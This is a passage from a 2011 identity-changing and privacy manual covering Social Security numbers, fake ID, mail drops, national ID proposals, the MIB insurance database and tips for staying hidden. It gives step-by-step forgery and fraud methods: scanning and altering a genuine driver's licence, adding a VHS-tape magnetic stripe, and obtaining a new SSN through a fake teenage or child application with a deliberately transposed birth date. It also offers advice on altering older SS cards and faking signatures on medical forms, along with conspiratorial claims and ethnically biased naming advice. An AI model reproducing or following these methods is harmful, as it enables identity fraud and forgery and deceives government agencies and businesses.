+5. Hide income from lawful taxation. +6. Evade lawful prosecution for past crimes. +7. Harass and/or stalk you. +8. Cash in government bonds (taxes are due from the +person cashing in the bonds, not the purchaser) +9. File fraudulent income tax returns (claiming non +existent refunds) +2. Whatever problems you are having, they must not be the +result of your actions. +3. You should be armed with documents from third parties +supporting your claim. (police reports, letters from credit +agencies or credit card banks, bill collectors) +4. Your credit status must be negatively affected. +5. You must be "significantly affected". +© Copyright 2011, Ariza Research, All rights reserved - ABP - 114 - +Reproduction in any form is prohibited without written permission. + +You will be turned down flat if: +1. They conclude that you are seeking a new number +to escape the legal consequences of your own acts. +2. If your poor credit record is the result of your own +lack of financial responsibility +3. You're seeking to escape problems caused by a +past bankruptcy +4. You desire to be issued a particular number +5. Others used your social security number in a lawful +way +6. Your proof is insufficient or your story is not +sufficiently convincing +There is an alternative approach that has worked for many +others. If you claim that someone is stalking you with intent +to do you harm, (and you can somehow document your story +- preferably with police reports), you may be successful. But +your story must be believable and you must have some +impressive proof. Taking along a witness can work if they +are willing to sign a sworn statement. +The use of duplicate social security numbers was not much +of a problem until the passage of the Immigration Reform +Law of 1986, which required a worker to supply a new +employer with a copy of their social security card before they +could begin employment. This law triggered an explosion in +the use of duplicate numbers as illegal aliens struggled with +the new restriction. +Additional Notes: +The Social Security Administration is now running TV ads in +an effort to spread the word about their new policy regarding +domestic abuse. Anyone who can document domestic abuse +(either male or female) can now obtain a new social security +number. +I don't have the latest details on this one yet as my local +social security office only has an announcement that the +© Copyright 2011, Ariza Research, All rights reserved - ABP - 115 - +Reproduction in any form is prohibited without written permission. + +policy has been changed but is still waiting for all the details. +This could be very useful for those who can qualify. Check +the official social security website for the latest details on any +of these new programs as they may change. +Social Security Loophole +When a private business asks for your social security +number, it's almost certain that they have no legal authority +to make such a request. They're just trying to get away with +something. Most Americans are sheep and will provide their +number without giving it a thought, almost as a reflex. But +you're different. +A useful strategy is to ask for their legal authority, as they +scratch their head in confusion (very few people challenge +any kind of request for personal information in our open +society), mention that in the past you had your identity stolen +and have no intention of going through that again! Add that +your attorney has given you strict instructions to only release +your social security number to those legally entitled to it. No +exceptions! +But there's another interesting loophole in the laws regarding +social security number usage. There are those amongst us +who believe that the bible predicts our future. In one part of +the book of revelation it says something about the antichrist +taking over society and requiring that each of us be given the +"mark of the beast" without which no one will be allowed to +buy or sell. +Could the social security number be that long anticipated +mark? I don't know but plenty of folks believe it is and that's +all that matters. The result is a special allowance for those +who have a "religious objection" to using their social security +numbers. +Our friends in the government have actually come up with a +special form for such holy individuals. You state your +religious objection to providing your number and request +they provide you with the appropriate form. You fill it out and +a separate number is used in your records. +Does this work? Yes, it does and it works because it's official +government policy. It will work even for those who apply for +© Copyright 2011, Ariza Research, All rights reserved - ABP - 116 - +Reproduction in any form is prohibited without written permission. + +federal or state welfare programs, though you can expect +that it will raise a few eyebrows. +A quick phone call before you visit will let you know if the +people you're about to deal with are up to date on this new +regulation. +A Quick History of the Social Security Number +When the social security system was first introduced there +was a good deal of concern that the numbering system it +used would lead to each of being numbered by the +government. Of course the government promised that they +would never use this number for any other purpose than to +track your retirement account. +The first social security cards included a note on the bottom +to that effect. It said "Not for identification". The government +rules also barred the social security administration from +placing other personal ID type information on the card. Only +the name and number could appear. Until recently there +were federal laws that blocked any government agency from +collecting personal information on individual citizens. +Of course that rule was completely crushed by the so-called +Patriot Act. Now as you read this the feds are busy building +centralized dossier files on each of us which leaves our +freedoms at jeopardy. +Now the number is being used to track every aspect of our +lives. It's now your employee number at work, your account +number on most forms of insurance, your official taxpayer +identification number with the IRS, your voter registration +number, your drivers license number (in some states), your +student ID number at almost any kind of school and let us +not forget how the credit reporting industry tracks us with it! +Though there are new laws that will threaten people with +drastic new punishments for using a fake social security +number, there are many brave souls who have used them. +Because this is now illegal, I can't endorse such an act. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 117 - +Reproduction in any form is prohibited without written permission. + +Fake ID +Fake id is a bad deal. There are new laws in almost every +state that make it a serious crime to even use a fake drivers +license. Sadly the good old days when you could carry +around several fake ids in your pocket that you could use +with impunity are sadly gone. After 9/11 things got even +tighter as the drivers license has taken on a whole new role, +particularly when you try to fly through an airport. +When applying for a certified copy of your birth certificate, +you’ll need a photocopy of your driver’s license. One clever +soul has reported that it's very easy to doctor a black and +white photocopy of your genuine license. +Before you send off your hard-earned money to some slick +fake id outfit you saw on the web, take the firm's name and +do a search using your favorite search engine. Chances are +you'll find numerous complaints from those who have been +ripped off by the site. +Though I have no direct knowledge, a company called +"Promaster" advertises widely on the web but we've noticed +a slew of complaints from suckers who never received their +ID. Our favorite search engine for investigating these outfits +is google.com. +Homemade Fake ID +The single most common need for a fake id comes when you +rent a mailbox (from one of those commercial mail box +companies). These outfits don't have any way to verify the +license you provide so you can usually get away with using a +not-quite-perfect DL. +Some have found the following useful. Today's PC +technology has provided us with some useful tools. Today +you can buy a high quality color scanner for around $100. If +you want one of the top models (look around CNET for the +latest equipment reviews) you'll have to shell out somewhere +around $250. USB scanners are best as they transfer data to +your PC much faster than the old units that connected via +the printer port. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 118 - +Reproduction in any form is prohibited without written permission. + +You simple scan your existing genuine driver’s license into +your computer, change the typed personal information and +then print out the result. You'll need some good graphics +software and a good, high-qualify printer. The result will be a +new license that isn't all that bad. You could never hand it to +a cop or today even a bouncer, but it can certainly get you a +new post office box. +Be careful though - the overall image quality (resolution) +should be 2,400 dpi. This includes the scanner, software and +the printer. Anything less will provide a "fuzzy" looking +product that will instantly arouse suspicions. +Today, making a reasonable good-looking fake drivers +license is easier than ever before. But if you want a really +good-looking license that will pass even a comprehensive +examination - You'll have to be a technical genius to crank +out such a license on your home PC. The few people who +still deal in fake id have sophisticated systems complete with +expensive software and very expensive and hard-to-find +high-resolution printers +If you do manage to find some fake id on the web, it will +probably disappoint you. +One clever individual came up with this sneaky idea. The +magnetic strip on the back of a fake id can be added quickly +and easily by simply cutting up some good old cheap VHS +video tape. He just cut up several inches of tape until it +looked right. +Also, if you check around the web you'll find plenty of places +that offer to sell "templates" of genuine blank licenses. Of +course the quality varies widely so be careful not to spend +too much for them. +Unfortunately the best graphic software packages are rather +expensive though 30-day trial versions are usually available +for free download. Templates of New Jersey licenses are +usually of very low quality and outside New Jersey, their +licenses are often very carefully examined for this reason. +(Update: the feds have been cracking down on the open +distribution of DL templates so they're harder to find. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 119 - +Reproduction in any form is prohibited without written permission. + +Paper Tripping - Adopting the Identity of a Deceased +Child +Perhaps you’ve heard about people who’ve assumed the +identities of deceased children by obtaining identity +documents using the information from their cemetery +headstones. If you think this approach sounds inviting, go +rent the movie "The Coneheads" and watch what happens to +Beldar Conehead when he attempts to "share" an identity +with one "Donald R. Decicco". +He quickly pops up on a computer along with about a dozen +other people who are using the same identity and social +security number. The immigration authorities have a good +laugh recalling all the losers that have used the Decicco +identity over the years. +The result - Mr. Beldar is immediately arrested. If you use +this grossly overused technique, you'll be breaking the law +and can expect to be sharing your "new" identity with several +other people. Think about it - is that really what you want to +do? +The problem with adopting another’s identity is that you can +never be sure exactly who you’re sharing the identity with. +There is simply no way that you can know how many others +have visited the same gravestone you have. Do you really +want to take the chance that you’ll be sharing an identity with +one of the FBI’s ten most wanted criminals? Or perhaps you +might like to share an identity with a cop-killer? Or an +international terrorist based in the Middle East? +One lady I know borrowed an identity from a gravestone only +to find a dozen cops surrounding her motel room 10 minutes +after she checked in! Though she had done nothing illegal, +she spent two days in jail while the FBI checked out her +story and eventually cleared her. It seems like someone else +(a criminal wanted for a murder and bank robbery) had +visited the same gravestone she had! +Recently several new reports have appeared that attempt to +resurrect this useless approach. They now claim to have +perfected methods that will assure that a particular infant’s +identity hasn’t yet been used. Don't believe them. +Even if you could be sure your infant’s identity is a virgin +© Copyright 2011, Ariza Research, All rights reserved - ABP - 120 - +Reproduction in any form is prohibited without written permission. + +one, how can anyone know who will attempt to share the +identity at some point in the future? +Now go rent the excellent movie "The Shawshank +Redemption" and see how a properly created new identity +can give someone (and his friend) a second chance at life. +A TRUE STORY +A friend thought that he had found a new way to resurrect +and use the identity of a deceased infant without having to +share it with anyone. I warned him about the dangers of the +classic dead infant "Paper Tripping" system but undeterred +he ventured out into a remote rural area where he found a +small church cemetery that looked as though no one had +visited it for years. +It was covered in thick vines and weeds. With considerable +effort, he managed to hack through the heavy grass that had +grown over a small grave in a remote area of the cemetery. +He was sure that no one had been there for ages. Surely no +one had ever found this grave before! +Using the information on the headstone, he easily located +the obituary in the local newspaper (at the library) which +gave him all the information he needed to get the death +certificate. +But when he finally requested the birth certificate, all he got +for his efforts was a form letter informing him that no birth +certificate would be forthcoming due to "excessive requests"! +Even though the gravestone was extremely difficult to find, +somehow others (many others) had requested copies of the +birth certificate in the recent past. +Our friends in the genealogy business publish books that +contain the inscriptions on headstones from all over the +country. Perhaps several identity-changers are using these +books so even abandoned and overgrown grave markers +aren't safe these days. +You should also know that many states are busily cross- +© Copyright 2011, Ariza Research, All rights reserved - ABP - 121 - +Reproduction in any form is prohibited without written permission. + +referencing their birth and death records (Canada has +already done this). The cross-referencing process here in +the US won't be completed for a decade or more. +If your target's birth and death have been cross-referenced, +you will be rewarded for your effort with a birth certificate +with "DECEASED" stamped across it in inch-high letters in +bright red indelible ink. Also, anyone who attempts to verify +the certificate (like the Social Security Administration or the +passport people at the US state department) will be promptly +informed that you are dead. Clearly, such a document is +useless. +Using a Mail Drop +Most identity changers start out by obtaining a new “home” +address where mail can be received. They usually use one +of those storefront PO box outfits. They avoid using an +official US post office box. The best units are the ones that +provide 24-hour access to the rented box. This way a box +renter can pick up their mail late at night when no one is +around. +They phone and request an application. They pay in cash or +with a money order. Most box renters use the boxes for +routine business mail as they don't have a local office. When +the box has been secured, they request some catalogs or +other routine looking mail. Receiving too little or too much +mail might cause problems. +The National ID Problem +Some elements in the federal government are seeking to +create a highly-fraud resistant, easily verifiable national ID +card in several different ways. The first approach would have +the Social Security Administration transform the current +Social Security Card into a sophisticated passport-type +document that would include a digitized photograph printed +right into the paper (instead of the more easily altered glued- +on photo), sophisticated high-tech features like bar-coding +and enciphered magnetic coding. +The card would probably include fingerprints in a format that +can be easily verified through the FBI's new online fingerprint +© Copyright 2011, Ariza Research, All rights reserved - ABP - 122 - +Reproduction in any form is prohibited without written permission. + +system. Such a document would be virtually impossible to +alter or counterfeit. Draconian new laws would include huge +penalties for anyone who attempted to use the document in +an unauthorized manner. +In addition, this new card would contain a chip into which a +wide range of personal data could be entered and then +retrieved and viewed by anyone who had access to the card. +The federal government is working feverishly to organize +and cross-index various databases in an effort to assemble +huge databases of personal data on US citizens. +Commercial interests are getting into the act also as several +airlines have proposed a "privileged traveler" system that +would link dozens of federal databases with the airline +reservation system. The system would allow frequent +business flyers to bypass long security lines and stroll +directly onto waiting planes without the usual scrutiny and +delays. +Many different bills are sloshing their way around +Washington that all have a common cause - to make it more +difficult to obtain any useful form of personal identity +documents. Criminals and Illegal immigrants have long +known that the southern states have less demanding +application requirements and since anyone can apply for a +license in any state, they flock to the more lenient states. +If they need a license in a more restrictive state, they simply +obtain a license in the easiest way possible and then use it +to obtain a new license in their desired state. This weakness +is now well known in Washington and there legislators are +looking at how best they can tighten up the application +procedures on a nation-wide basis. +Many states are training their clerks so they can more readily +recognize phony ID documents, particularly birth certificates +and fake drivers licenses. The government has created +bound volumes with images of the most widely sold +documents. For this reason anyone tempted to purchase +blank ID documents on the web should think again. +The most successful identity changers prefer to use +documents they created themselves on their own computers. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 123 - +Reproduction in any form is prohibited without written permission. + +Following the same basic design as a genuine document +seems to work best. +In a decade or so you can expect the feds will standardize +US birth certificates and drivers licenses so they will all look +alike though there is considerable resistance to the idea. If +and when this occurs, the current hodge-podge of birth +certificate forms will be history. But for now the whole system +is based on a confused conglomeration of different +document designs. +Most of these new issuing restrictions will be focused on +foreigners so those who look, act and speak like typical +Americans shouldn't have any real problems. But those who +look even a bit like an Arab will have constant problems. +INS verification of resident alien identification is being +upgraded so that instant online verification can be achieved. +Right now a two to four hour verification delay is usual and +the databases involved are notoriously inaccurate and poorly +coordinated. This will soon change. +A new database of temporary residence visas and green +cards is being assembled and will soon be available to +driver’s license bureaus all over the country. Foreign driver’s +license applicants will be carefully screened. If they're not +here legally, not only will they not get their license, they will +face immediate deportation. A system like this could have +identified the 9/11 terrorists and exposed their whole +operation years earlier. +Even if a foreign applicant passes the INS check, they'll be +issued a license that's only good for one year and is of a +different color and design than those issued to US citizens. It +will also include data on the holder's visa/green card status. +That would require them to return to the license bureau and +re-apply each year. +Their licenses will be mailed to their home address, the one +that the INS has on record even in states that issue licenses +on the spot (this would make it much more difficult for foreign +agents to slip into the US and move around freely without +any fixed US address). +This will force aliens into carefully maintaining their resident +status to avoid problems. Any policeman who stops them +© Copyright 2011, Ariza Research, All rights reserved - ABP - 124 - +Reproduction in any form is prohibited without written permission. + +would be able to instantly determine their right to be in the +US and trigger a deportation if their status is not completely +legal. +Soon all states will have online verification of applicant social +security numbers. Some do today but many don't have the +funding or motivation. Under new federal legislation they +may soon be required to set up the required systems. +Since 9/11 California has instituted restrictive new rules that +make it very difficult for foreigners to obtain drivers licenses. +Their social security number and resident status must be +verified (through the use of paper documents) with SSA and +INS by mail before a license can be mailed out. +As a result, police there now report vast numbers of aliens +driving around without licenses or insurance. For this reason +(and others) some states have recently stopped asking for +social security numbers. They include Texas, North Carolina +and Utah. These states have a lot of illegal residents and +don't want to land in the same mess as California. +Washington has made it illegal to use a person's social +security number as their drivers license number. Some +states like Ohio and Alabama ask for the number but don't +display in on the license and is not verified. Does all this +sound confusing? It is! +Some states have found the idea of using biometrics like +fingerprints or retinal scans unacceptable from a privacy +standpoint. There are problems with these systems, which +reduce their reliability. But other states have started down +that road. Hawaii, Texas, California and Colorado collect +fingerprints from drivers license applicants though they have +no way to verify them immediately at the present time. +From now on you can expect the kinds of documents they're +willing to accept to become more restrictive. In the past the +baptismal certificate was a useful ID document but it's likely +to fade into history as regulations are tightened. +Notarized copies used to do very well but you can expect +that they'll now insist on only certified copies. +Does your state do online social security number +verifications? It's easy to find out. Just go online and go the +© Copyright 2011, Ariza Research, All rights reserved - ABP - 125 - +Reproduction in any form is prohibited without written permission. + +state government site. There you will find a link that will +provide the needed information. Or you could call the license +bureau personally and just ask. Ask them exactly what +documents they'll accept. +If you've just moved to town and your personal papers are +still in transit, you'll need to know what the rules are in detail. +Then pump them for information until you get the answers +you want. +If you have a suspended or revoked license from another +state this fact will quickly be discovered if you're applying +using the same name and birth date. The NDR (National +Driver Register) will trip you up. +Funny thing here is that while the good old baptismal +certificate is now recognized as being almost worthless, +another ID document has more or less taken its place. The +voters registration card gets far more respect than it +deserves. +It's ridiculously easy to obtain. Under new rules designed to +encourage us to vote, the application procedure is almost +comical. They hand you a card. You fill it out. They take it +and say thank you. The card is then mailed to you. The only +requirement is that you have a mailing address. You'd think +a clerk would laugh at such a document, but instead they +accept it with deep respect. +Other proposed legislation would bar anyone from opening a +bank account, buying an airline ticket, boarding a plane, +starting a new job, buying a firearm or even making a retail +purchase without first presenting this new document for +online verification. By monitoring the times and locations of +your online verifications, the government could effectively +track your each and every move. +And worse, anyone who performed an online verification +would have instant access to every bit of info the federal +government has on you in all their various databases. +Information abuse could never be adequately avoided +despite the government's claims to the contrary. +If the police pull you over for any reason (and they no longer +need a reason - they can now pull you over just because you +© Copyright 2011, Ariza Research, All rights reserved - ABP - 126 - +Reproduction in any form is prohibited without written permission. + +meet a particular "profile") you'll be legally required to +produce this new document and undergo the online check. +If you are unable to produce your verifiable card, you'll be +detained or arrested until access to your files can be +restored and verified. +But if you think about it, the document itself is only important +as it contains your fingerprint data. Police cars will be +equipped with online FBI fingerprint verification systems. A +cop swipes your card through a card reader, you press your +thumb on a small sensor and your entire life's history pops +up on the computer screen in a few seconds. (Actually the +police can call up your file before they pull you over by +running your license plate number through their new +dashboard laptop computer). +Does all this make you nervous? It should scare you to +death! Our hard-won constitutionally guaranteed freedoms +are rapidly being devoured by what is fast becoming a high- +tech police state. +The second approach to a national ID involves our driver’s +licenses. Until now drivers licenses have been completely +under the control of state governments. Each state created +licenses with unique designs and various combinations of +security features. States like Michigan produce high-tech +licenses that are all but impossible to forge or alter while +Tennessee is at the other end of the spectrum with a low- +tech license they give out with few restrictions or scrutiny. +Under new legislation the states would surrender control to a +centralized federal system in Washington, DC. Washington +would then dictate exactly what information the card must +include and also it's format and color. Only those driver’s +licenses that meet the federal standard will be accepted by +the feds when citizens apply for benefits, employment or +travel. +States that don't "buckle under" to the new requirements will +be very heavily penalized and their citizens will pay a price +through federal harassment. Some federal funds for highway +construction and other uses might also be curtailed for states +that don't quickly comply with the new federal restrictions. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 127 - +Reproduction in any form is prohibited without written permission. + +Fortunately for us, these well-oiled plans are way behind +schedule. The Social Security Administration has flatly +refused to become involved in the photographing and +fingerprinting of tens of millions of people. +Money is a problem also as the cost of all this has exceeded +previously established limits for unfunded new programs so +the bills have been shelved until new funds can be found. +Also, the federal demand that all drivers’ licenses bear the +holder's social security number; have been dropped for now +due to rampant identity theft. Many states allow applicants to +specify whether or not they want their SSN on their licenses. +A $10 million dollar research program was passed in early +January of 2002, which seeks to identity the biological +factors that could best be used in a new national ID card. +(IBM has created a workable online fingerprint verification +system) +Other legislation seeks to standardize both the US birth +certificate and the US state drivers licenses in preparation +for the creation of a nation-wide current drivers license +database. +The overall goal is to create an ironclad national ID card that +could be quickly verified online against DMV, NCIC (crime), +INS (immigration), IRS (taxes), vital records (birth certificate) +and gun-control databases. Any such card is at least 15 +years away but you can expect big brother to steadily move +in that direction starting with a standardized drivers license, +which could appear within a decade. +Thankfully the Bush administration has voiced opposition to +the entire idea of a national ID card and the ACLU is doing +all it can to oppose the entire concept. +On 2/19/02 news stories surfaced that outlined a new +government program aimed at starting the national ID +process with truck drivers. In the interest of road safety the +federal government is working on a national ID system with +an online verification service based in Washington, DC. The +plan is then to expand the system to include train +conductors, airline pilots and other employees who are in +positions of public trust. Is this the thin edge of the wedge? +© Copyright 2011, Ariza Research, All rights reserved - ABP - 128 - +Reproduction in any form is prohibited without written permission. + +Social Security Number Verification +During the last year the following states have begun to verify +the social security numbers of all applicants in real time +before issuing a drivers license. +Alabama, Arizona, Washington DC, Idaho, Maine, Maryland, +Massachusetts, Mississippi, Missouri, Nebraska, Nevada, +New York, Ohio, S. Dakota, Tennessee, Virginia, +Washington and Wyoming. +If you have more recent information on this trend, please +drop us a note and keep us up to date. Thanks. +Identity Theft Problems +Unfortunately, identity theft is exploding. To help combat this +new crime, many states have recently allowed applicants to +request that their drivers’ licenses not display their social +security numbers. So if you have your wallet or purse stolen, +the thief will not have your ssn. +This trend flies in the face of the new federal legislation, +which, of course, requires that the driver’s licenses include +the social security number in readable, magnetic and bar +code formats. +Currently there are two different sets of federal laws that are +on a collision course. One federal law requires that all +driver’s licenses include social security numbers within two +years while a different federal law requires that drivers have +the option of omitting their ssn from a new drivers license. +The states are very confused about their future plans. +What's the bottom line on all this? Though their original effort +has been thwarted for the present, don't expect our "friends" +in Washington to abandon their repressive plans. You can +bet they will continue to work behind the scenes. And when +they're ready, they'll "roll out" the new card under the guise +of fighting crime, drugs, child molesters and terrorism and +everything else people fear. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 129 - +Reproduction in any form is prohibited without written permission. + +After our government and corporate controlled media have +fanned the flames of mass anxiety to a fever pitch, the +American people will drop to their knees and beg for the new +ID without giving a thought to the terrible effect this will have +on our hard-won freedoms. +Avoiding the Dreaded MIB +The US insurance industry maintains a centralized patient +database that they use to screen insurance applicants. This +information (usually negative) is used to deny them +insurance or services. Most of the information it contains +was obtained from insurance application forms so you +should carefully consider what you should or shouldn't write +down. +Say you ask your doctor to do some blood tests. As a matter +of routine he throws in an HIV test just to be sure. To +everyone's surprise it comes back positive. Of course you're +shocked but you are also soon to be uninsurable. +When your diagnosis hits the MIB computer, any insurance +company you apply to will have access to this information +and will quickly deny you coverage. Your existing insurer +may also soon find that you no longer belong to the target +group your present class of insurance was intended for. +In short, your insurance will soon be cancelled and +replacement insurance will be unavailable. In America only +the healthy get insurance. This insane system has got to +change! +Information is retained for a period of seven years and can +be reviewed by patients. You can get the details by phone +at: (617) 426-3660. Strangely, their records are not +organized by social security number. +If the data they have is incorrect (this has been known to +happen on occasion) - let them know and demand that they +correct their information. Threaten to launch a web site with +all the details of their abuse of your file if they won't make the +change. Or perhaps a threat of legal action will be required +to clear the logjam. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 130 - +Reproduction in any form is prohibited without written permission. + +When you seek medical care, you may be handed a routine +form to sign. Somewhere near the bottom will be one or two +signature lines that will authorize them to "release medical +information to any and all that may request it". +Wow - this is a blanket authorization you really should avoid +signing. If you leave the signatures blank you can expect +some pressure to be applied (Sorry - but we can't treat you if +you don't sign here and here). +I've found the following to be the best course of action. On +each signature line write something like "release not +authorized". If you scribble it a bit, the clerk won't notice that +it's not a genuine signature. I've done this twice with no +problem at all. And if you pay cash (extremely rare these +days), you can tell the clerk that there's no need for +signatures, as you have no insurance. (Don’t forget to ask +for cash discount!) +College Towns are Great +Wonder where’s the best place to live? What kind of town +would be best? Generally speaking a new resident will stand +out in any rural setting. Also, small towns tend to be hot beds +of gossip. Everyone seems to know everyone else's +business and new arrivals are a favorite subject for the local +gossip mill. +Then there are those who want to flock to tourist areas. Here +there is a rapid turnover in people so new people should be +able to blend in and get lost. But you run the risk of running +into someone you know from home. Such an encounter +could be a complete disaster. They also tend to be +expensive places to live. +Looking at all the factors the best overall place to live would +be in a nice medium sized college town. These towns are +generally pleasant places with just the right turnover in +population. Each year a class graduates and departs while +another arrives. Also some part of the faculty changes each +year. As a result the locals get used to seeing plenty of new +faces on a regular basis. There are usually very few tourists. +Also, during economic downturns the economy of a college +town will usually remain relatively steady and unaffected. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 131 - +Reproduction in any form is prohibited without written permission. + +Social Security Numbers +Up until five years ago or so, the obtaining of a new social +security number was not all that difficult but sadly things +have changed. You used to be able to apply for a new card +entirely through the mail. Today anyone over the age of 20 +must appear in person and go through an "interview". +Though it is illegal to sell forged social security cards, some +companies get away selling metal cards that look like the +original, stamped with the name and number of the holder. +The social security administration does not prosecute these +companies. Some people who don’t know better will accept +them as ID if you simply say that your original is kept in your +safety deposit box. +One of these manufacturers is: Walter Drake, 5186 Drake +Building, Colorado Springs, CO 80940 - (719) 596-3853. +They sell a nifty solid brass "card" (item number P4004 - +Social Security Plate - $3.99 plus $2.95 shipping). If this firm +is no around, look around the web under "aluminum social +security card". +Most SSN applicants are infants whose parents must obtain +a new number in order to claim them as dependents on their +taxes or teenagers who need the number so they can start +working. Men over the age of 20 are going to have a tough +time qualifying for a new social security number. Women +who were recently divorced commonly apply for new +numbers as they claim they never needed one before. This +interview should present no problem for a woman, +particularly if she has recent divorce papers with her. +An old friend who lived overseas for many years came up +with the following. He was an oil worker who worked in the +oil fields of Saudi Arabia. When he was 35 years old he +returned to the U.S. and had to apply for a SSN. He strolled +into the social security office and was promptly interrogated. +He explained his situation and produced documents +supporting his story. He promptly got his new SSN number. +He was treated well and had no problems. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 132 - +Reproduction in any form is prohibited without written permission. + +The social security people will verify your BC (If you’re over +age 17) and may even verify your new parents’ birth +certificates. No problem there. Also, the application requires +a local phone number (which they may trace to find your +address and real name) should the application run into any +problems. Before you leave their office ask if you can phone +in for your new number rather than waiting for their snail-like +bureaucracy to grind out a card. +Some commercial post box rental stores offer a "stand-alone +voice-mail" system that will allow you to record a recording +using your own name and voice. +This will create a good image should the social security +people call. Such a number is not easily traced. You might +want to rent a PO box at the PO box rental store. This will +allow you to use a PO box while providing a street address +that looks like an apartment address. (Example: 123 Main +St. Apt 456 instead of PO Box 456) +A note about forged social security cards: In the late +seventies there were a slew of mail order firms that sold +blank social security cards for two bucks each. No longer. A +new federal law makes it a federal felony to make or sell +forged SSN cards. +In major cities there are sleazy-looking characters strolling +around the streets offering to get you any kind of ID you +want. They demand cash up front and guess what happens - +they run off never to be seen again. it’s a neat crime as the +customers never report the crime. Let the buyer beware! +This gem comes from numerous sources. Simply write up a +request for a SSN application in pen on a sheet of notebook +paper. Make the letter look like a sixteen-year-old girl wrote +it. The social security people receive tons of these letters +everyday. You apply as if you are only sixteen. (Your new +parents will have to have lived long enough to raise you +however.) You then submit your application, get your new +SSN and use it no matter your age. +Update: The technique above may still work but recent +changes to social security regulations are intended to restrict +the issuance of new social security numbers to small +children only. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 133 - +Reproduction in any form is prohibited without written permission. + +It's clear that big brother is moving toward a system where +only newborn babies will be issued new numbers. But there +are still millions of small children out there who don't have +numbers issued to them yet. +The best strategy now is to submit an application for what +appears to be your child - under age 5. Find the "social +security online" site (you can find it using any major search +engine). Carefully read up on the latest rules regarding +childhood applications. +Once the number is issued it can be used in almost any way. +The social security people won't care, as they have no +reason to launch expensive investigations. On your +application you can simply transpose two numbers in the +birth date which throws it open for you to, at some future +date, claim that a typographical error was made. +And since the age of the applicant appears to be under age +18, there is no need for the dreaded "mandatory personal +interview". +Old Cards - New Cards +The social security card is a funny sort of document. When +the cards first came out many people were concerned that +the government would use the social security number to +track citizens. To help reduce these fears early cards had +"Not for Identification Purposes" stamped across them in +red. +Those old fears were well founded. Today when you give +someone your social security number you are providing +them the key to all your computerized records private and +public. Worst of all, you have no way of controlling who +views what. +Those early fears are why the social security card contains +so little information. Only your name and number appear. +This makes it a very unusual form of ID. By itself it's almost +worthless. But used in conjunction with the most important +primary form of ID, a driver’s license, you have the magical +combination that can open many doors. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 134 - +Reproduction in any form is prohibited without written permission. + +You can't get a job without one. It's taken as defacto proof of +US citizenship, you'll need one to open a bank account and +your drivers license number may (or may not) be your social +security number. The IRS (since 1961) and schools use the +SSN for their records. The card may not provide much +information, but it's an absolute necessity for new identity +changers. +Very Best Names +The very best first names for our purposes are those that are +not gender-specific such as Francis, Pat, Terry, Rob (Robert +or Roberta) or Dana. This adds yet another confusion factor +to confuse anyone interested in your new name. +Before 9/11 almost any name would do but today it's best to +stick to American sounding surnames. Names like Hamilton, +Peterson, Anderson, Sullivan and Smith are typical names +that anyone would rapidly identify as being American. +Muhammad al Tarif is an example of a name you would want +to carefully avoid these days. +Forging a Social Security Card +In 1983 the social security administration came out with a +new social security card. It's printed on a special tamper +resistant stock that is held in a single vault in Maryland. +Take a good look at it and you'll see that the background is +marbled in a very tricky way and that the red insignia is +intertwined with the text. This makes it very difficult to forge +or modify. In addition, a new law forbids holders from +laminating the card. (Lamination makes it all but impossible +to detect tampering) +That's the bad news. Now for some good news: The older, +easier to alter cards are still valid. So if your working history +started before 1983, the older less tamper-resistant card is +still very useful. The old card was printed on plain old white +card stock and was very often laminated. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 135 - +Reproduction in any form is prohibited without written permission. + +You should also know that foreigners who live or do +business in the US are issued special social security cards +that look like the others except they bear a warning "Not for +Employment Purposes" across their face. Under IRS rules +foreigners must pay US taxes for any income they earn while +here even though they are citizens of some other country. +These cards are used to help track their earnings and be +sure they pay their US taxes. +There have been those who have used this information as +foreign birth certificates come in a bewildering variety of +colors and shapes. +The social security administration issues these foreign cards +without much fuss, as they are only good for paying taxes. +Perhaps you know someone who was born overseas and +has their original foreign BC. +How to Verify a Social Security Number +An employer can verify a social security number by calling: +1-800-772-6270 (7am to 7pm EST). +You'll need the following information: +1. The social security number +2. First and last name +3. Date of birth +4. Gender +© Copyright 2011, Ariza Research, All rights reserved - ABP - 136 - +Reproduction in any form is prohibited without written permission. + +92 Advanced Privacy Tactics +1. Checks should never be cashed at a local bar. Those +dives are monitored by local law enforcement. Reports of +arrests made in local neighborhood bars appear in the paper +on a regular basis. They know that if the man they’re after +isn’t in one of these crappy local bars, someone there will +probably know where he is. +2. Make all phone calls from a pay phone and change which +pay phone you use from time to time. If you would rather call +from home, purchase one of those "Caller ID blockers" +boxes from Radio Shack. It's a little plastic box that connects +between your phone and the line outlet on the wall. They +cost about $20 and are well worth the price as they block +any attempt to retrieve your number when you make an +outgoing call. Some come with a little on/off switch that you +can use to enable caller-id if you need to. When you lift the +phone the box lets you know it's working by giving you three +little beeps. The phone company in most areas provides a +free way to turn off your caller-id but it isn't as effective as +the Radio Shack box. +3. At work avoid giving your fellow employees too much info. +Don't let the gossip mill get interested in you. Give them a +minimum of info in a way that satisfies them but avoid giving +them too much grist for the mill. +4. Drop any magazine or newspaper subscriptions you may +have. If you miss your favorite magazine, buy copies from a +newsstand for cash. Don't order special magazines through +a stand or bookstore. If you really need to get a copy of a +hard to find magazine, call the magazine and ask them for +the address of the nearest retail outlet that carries their +magazine or visit your local library. +5. Avoid attending any sort of religious services. If you feel +the need, read your bible and pray at home. If you must +attend a church, be sure to provide them with a phony name. +Make donations in cash only. Do not provide other church +members with any personal information. They can be real +nosy gossips, especially in small towns. In the south church +members spend half their time praying and the other half +gossiping about the newest arrivals in town. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 137 - +Reproduction in any form is prohibited without written permission. + +If a snoop knows that you are a religious Catholic, they'll +check around with the Catholics in any area they suspect +you might be living. +And if you're a dedicated member of some smaller faith, it +makes the snoops job easier as there are fewer churches to +search. +6. Keep your personal schedule as varied as possible. Don't +come and go like clockwork. You don't want to be too +predictable at this stage. Your daily personal movements +should match the story you give your neighbors as much as +possible. If you told them you have a job, they'll expect you +to leave early each morning and arrive back home in the +early evening. Don't give them any reason to doubt your +truthfulness. +7. No matter how difficult it might be - 